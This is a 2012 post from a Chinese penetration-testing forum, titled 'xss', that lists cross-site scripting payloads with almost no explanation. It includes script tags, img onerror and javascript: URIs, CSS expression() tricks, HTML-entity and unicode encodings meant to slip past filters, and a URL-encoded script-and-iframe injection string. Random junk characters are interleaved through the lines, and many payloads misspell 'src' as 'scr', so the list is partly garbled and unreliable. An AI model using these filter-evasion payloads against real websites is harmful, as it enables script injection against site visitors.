中国网络渗透测试联盟

标题: xss [打印本页]
作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)$ ]$ \' t) @1 C  W4 Q- n# ^
<img scr=javascript:alert("跨站")></img>
3 Z( N8 z0 @$ n* L7 j$ \<img scr="javascrip&#116&#58 alert(/跨站/)></img>
/ q7 x# C- A1 m" S<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
3 Q2 c9 ^7 |! N. {% H# U<img scr="#" onerror=alert(/跨站/)></img>
" L* U; r* g& b/ A9 _) |$ S: ]<img scr="#" style="xss:expression(alert(/xss/));"></img>- H8 m! s% f# r3 r, z; u
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ \) C; B/ y- W5 w, S% q<img src=vbscript:msgbox ("xss")></img>
0 I, H( r$ _2 g& j5 J/ X+ y6 e% Y<style> input {left:expression (alert('xss'))}</style>. a! t4 U; s- r/ W# |' _' F0 |! e/ `
<div style={left:expression (alert('xss'))}></div>
1 p# N$ q6 z* K4 W$ j) @) o5 t<div style={left:exp/* */ression (alert('xss'))}></div>
$ n. c& S. E% ^; t7 A<div style={left:\0065\0078ression (alert('xss'))}></div>
4 V, m; W% V2 ^; B5 p" Yhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
4 [9 H8 Y% }# e% Vunicode <div style="{left:expRessioN (alert('xss'))}">/ K( \4 b; F" e

: @5 r& l0 P4 S& L"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
1 i2 I& W7 v1 k, [. L; k2 l



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2